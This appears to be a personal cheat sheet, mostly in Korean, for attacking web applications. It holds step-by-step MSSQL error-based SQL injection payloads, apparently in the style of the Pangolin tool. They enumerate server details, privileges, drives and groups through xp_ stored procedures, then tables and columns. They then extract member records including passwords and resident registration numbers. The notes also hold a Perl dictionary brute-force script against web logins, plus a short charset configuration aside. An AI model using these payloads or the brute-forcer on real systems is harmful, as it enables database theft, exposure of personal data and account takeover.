applicationlayer

-Information
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
.
.
.
동일한 응답이 나오면 중단

--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--

--LocalGropus :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
>
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  3 [name],[description] from pangolin_test_table group by


-Data
--Tables(조회)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
sysobjects의 레코드중 xtype이 u인 갯수 (사용자테이블 갯수)

' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
테이블명 추출

--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124)  from [sysobjects] where name=0x6d0065006d00620065007200)=0--
테이블명을 헥사로 변경(우회)하여 id값을 추출 (from sysobjects)

' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
id값을 가진 모든 column갯수 추출 (from syscolumns)

' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
각 column의 이름 추출 (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
계속 추출

--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
해당 테이블(member)의 레코드 수 추출

' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
각 레코드의  필드값 알아내기

이어서..

웹 개발자는 자신이 원하는 형태로 Charset을 정하기를 원하는데 웹서버의 기본 Charset으로 인해 문제가 발생할 수 있다.

브라우저에서 아래의 태그를 읽어들이더라도 웹서버Charset이 euc-kr로 되어있다면 euc-kr로 해석하게 된다.
<META HTTP-EQUIV=CONTENT-TYPE CONTENT=text/html charset=UTF-7>


해결방법
httpd.conf 또는 apache2.conf파일의 AddDefaultCharset을 Off로 설정한다.

AddDefaultCharset Off

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
if( $#ARGV != 1 )
  { die "Usage: webbf.pl \"192.168.1.150/login.asp?id=TEST&pw=TEST\" [DICfilename]\n";}

$ARGV[0] =~ /([\w.\/]{1,30}\/\w{1,20}\.\w{1,4}\?)([\w=&]{1,100})=TEST&(\w{1,10})=TEST/;
$URL = $1;
$IDparam = $2;
$PWparam = $3;

$DicfileName = $ARGV[1];
open( fileHandle, $DicfileName ) || die "Cannot open $fileName.\n";

$attnum=1;


while($aLine =<fileHandle>)
{
    $aLine =~s/\r//;
    $aLine =~s/\n//;
    
    $ID = $aLine;
    $PW = $aLine;

  $bruteforce = 'http://'.$URL.$IDparam.'='.$ID.'&'.$PWparam.'='.$PW;
  $req = HTTP::Request->new(GET => $bruteforce);
  $res = $ua->request($req);
  print $attnum++.'.--->'.$bruteforce."\n";

  if($res->content !~/아이디가/)
 {
    print "bruteforce success\n\n\n\n";
    print $res->content;
    die "\n";
  }
}


웹 애플리케이션 로그인 dictionary attack공격
한번 요청시마다 일일이 다시 세션을 맺는데 이건 보완해야겠다.